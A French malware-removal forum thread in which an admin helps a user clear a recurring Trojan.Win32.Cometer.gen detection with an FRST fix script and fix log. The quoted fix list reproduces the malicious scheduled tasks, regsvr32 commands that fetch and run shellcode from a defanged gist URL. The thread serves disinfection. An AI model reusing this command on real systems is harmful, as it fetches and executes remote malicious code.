Trojan.Win32.Cometer.gen [résolu] Le sujet est résolu

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

yoann.corbi
Messages : 4
Inscription : 12 août 2019 23:11

Trojan.Win32.Cometer.gen [résolu]

Message par yoann.corbi » 12 août 2019 23:28

Bonjour à tous,

J'ai malheureusement télécharger un mauvais fichier qui ma infecté. Je m'en suis aperçu lorsque j'ai installé le logiciel.
J'ai donc fais un déinfection avec adwcleaner, spybot, Malwarebytes Anti-Malware (MBAM) etc. Et j'ai mon antivirus Kaspersky qui sait réveiller ^^
Il m'a fais un bon nettoyage et l'ordinateur à l'air stable maintenant mais j'ai malheureusement des restes qui sont bloquer dans System Memory.
Kaspersky mais répare mais a chaque redémarrage reviens. Je sais plus trop quoi faire.

Le message de Kaspersky : MEM:Trojan.Win32.Cometer.gen (Emplacement: System Memory)

Pouvez vous m'aider pour le supprimer définitivement ?
Et quelle précaution je dois prendre par la suite de ce virus sur mon pc ? (Changer les mots de passe ? ...)

Je vous joins les fichiers de FRST
https://pjjoint.malekal.com/files.php?i ... 3m14n10p15
https://pjjoint.malekal.com/files.php?i ... 14u5t15u11

Je vous remercie d'avance.




Malekal_morte
Site Admin
Site Admin
Messages : 98089
Inscription : 10 sept. 2005 13:57
Contact :

Re: Trojan.Win32.Cometer.gen

Message par Malekal_morte » 13 août 2019 09:34

Salut,

Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
CCleaner
Java
Spybot - Search & Destroy (inefficace et inutile)
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu tiens à le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : [https://www.malekal.com/supprimer-cclea ... e-windows/]




Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-3902013721-568891546-3622899016-1001\...\Run: [NoxDaemon] => C:\Users\Corbi\AppData\Roaming\NoxSrv\NoxSrv.exe [115712 2019-06-27] () [Fichier non signé]
Task: {0FE41B8E-957F-4367-8097-EC90C10B2387} - System32\Tasks\SEE TECHNICAL 3D => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp  C:\Windows\SysWOW64\system.dll
Task: {5B43628C-1101-40D7-A5D2-9EFFE2D2B92C} - System32\Tasks\Defendeer => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp  C:\Users\Public\Music\system.dll
Task: {78273F69-05F2-4CB6-AF3C-1E3D795354E7} - System32\Tasks\Driver Booster SkipUAC (Corbi) => C:\Program Files (x86)\IObit\Driver Booster\6.6.0\DriverBooster.exe
Task: {A9979832-E636-4961-B54A-8B12842D75BC} - System32\Tasks\Defendere => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp  C:\Users\Public\Music\system.dll
C:\Windows\SysWOW64\system.dll
C:\Users\Public\Music\system.dll
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

yoann.corbi
Messages : 4
Inscription : 12 août 2019 23:11

Re: Trojan.Win32.Cometer.gen

Message par yoann.corbi » 13 août 2019 11:01

Bonjour,
Merci d'avoir répondu aussi rapidement.
J'ai effectuer le fichier voici le retour :



Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 10-08-2019
Exécuté par Corbi (13-08-2019 10:41:40) Run:1
Exécuté depuis C:\Users\Corbi\Desktop
Profils chargés: Corbi (Profils disponibles: Corbi)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-3902013721-568891546-3622899016-1001\...\Run: [NoxDaemon] => C:\Users\Corbi\AppData\Roaming\NoxSrv\NoxSrv.exe [115712 2019-06-27] () [Fichier non signé]
Task: {0FE41B8E-957F-4367-8097-EC90C10B2387} - System32\Tasks\SEE TECHNICAL 3D => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp C:\Windows\SysWOW64\system.dll
Task: {5B43628C-1101-40D7-A5D2-9EFFE2D2B92C} - System32\Tasks\Defendeer => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp C:\Users\Public\Music\system.dll
Task: {78273F69-05F2-4CB6-AF3C-1E3D795354E7} - System32\Tasks\Driver Booster SkipUAC (Corbi) => C:\Program Files (x86)\IObit\Driver Booster\6.6.0\DriverBooster.exe
Task: {A9979832-E636-4961-B54A-8B12842D75BC} - System32\Tasks\Defendere => regsvr32.exe /s /i:shellcode,hxxps://gist.githubusercontent.com/sparta34/1ef93b4e482d12163ebda6a8ff95fd51/raw/295aa3c640737c7c05eaf730f2da944e9ba5e3f8/rdp C:\Users\Public\Music\system.dll
C:\Windows\SysWOW64\system.dll
C:\Users\Public\Music\system.dll
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKU\S-1-5-21-3902013721-568891546-3622899016-1001\Software\Microsoft\Windows\CurrentVersion\Run\\NoxDaemon" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0FE41B8E-957F-4367-8097-EC90C10B2387}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FE41B8E-957F-4367-8097-EC90C10B2387}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\SEE TECHNICAL 3D => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SEE TECHNICAL 3D" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5B43628C-1101-40D7-A5D2-9EFFE2D2B92C}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B43628C-1101-40D7-A5D2-9EFFE2D2B92C}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Defendeer => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Defendeer" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{78273F69-05F2-4CB6-AF3C-1E3D795354E7}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{78273F69-05F2-4CB6-AF3C-1E3D795354E7}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (Corbi) => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster SkipUAC (Corbi)" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9979832-E636-4961-B54A-8B12842D75BC}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9979832-E636-4961-B54A-8B12842D75BC}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Defendere => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Defendere" => supprimé(es) avec succès
C:\Windows\SysWOW64\system.dll => déplacé(es) avec succès
C:\Users\Public\Music\system.dll => déplacé(es) avec succès

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => supprimé(es) avec succès
HKU\S-1-5-21-3902013721-568891546-3622899016-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3902013721-568891546-3622899016-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3902013721-568891546-3622899016-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

=========== EmptyTemp: ==========

BITS transfer queue => 11558912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 53768266 B
Java, Flash, Steam htmlcache => 369354145 B
Windows/system/drivers => 22351326 B
Edge => 10843188 B
Chrome => 403353847 B
Firefox => 612817703 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 74506 B
LocalService => 0 B
NetworkService => 11615664 B
NetworkService => 0 B
Corbi => 1407120825 B

RecycleBin => 8500451568 B
EmptyTemp: => 10.6 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 10:43:59 ====



Par contre cela ma effacer tout mes onglets google chrome :( et impossible de les retrouver.
Pour le virus au moment du redémarrage il me la trouver de suite par kaspersky j'ai fais la correction de suite. Et je vais voir dans la journée et demain si reviens.

Malekal_morte
Site Admin
Site Admin
Messages : 98089
Inscription : 10 sept. 2005 13:57
Contact :

Re: Trojan.Win32.Cometer.gen

Message par Malekal_morte » 13 août 2019 11:05

Bizarre pour Google Chrome.
Peut-être voir là : https://www.malekal.com/recuperer-favor ... -plantage/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

yoann.corbi
Messages : 4
Inscription : 12 août 2019 23:11

Re: Trojan.Win32.Cometer.gen

Message par yoann.corbi » 13 août 2019 11:14

Merci je suis aller voir le liens.
Ils parlent de favoris que je n'ai pas perdus.
Ce que j'ai perdu ce sont mes onglets qui se ré ouvrent à chaque redémarrage du navigateur google chrome.
Quand ça plante, ce qui est très rare il me demande ci je dois ré ouvrir les onglets de la session précédente mais là rien :/


Malekal_morte
Site Admin
Site Admin
Messages : 98089
Inscription : 10 sept. 2005 13:57
Contact :

Re: Trojan.Win32.Cometer.gen

Message par Malekal_morte » 13 août 2019 12:05

Ca se configure dans les paramètres l'ouverture des pages sur Chrome.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

yoann.corbi
Messages : 4
Inscription : 12 août 2019 23:11

Re: Trojan.Win32.Cometer.gen

Message par yoann.corbi » 18 août 2019 09:54

Bonjour Malekal_morte,
Plusieurs jours que mon pc tourne et donc plus de soucis avec ce trojan.
Je te remercie infiniment :)
Dommage seulement d'avoir perdu mes onglets chrome :(
C'est comme ça. Je n'avais pas cas avoir 50 onglets ouvert ^^

Bonne continuation à toi.

Malekal_morte
Site Admin
Site Admin
Messages : 98089
Inscription : 10 sept. 2005 13:57
Contact :

Re: Trojan.Win32.Cometer.gen

Message par Malekal_morte » 18 août 2019 12:08

Oui dommage
et de rien !
Bon WE à toi =)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »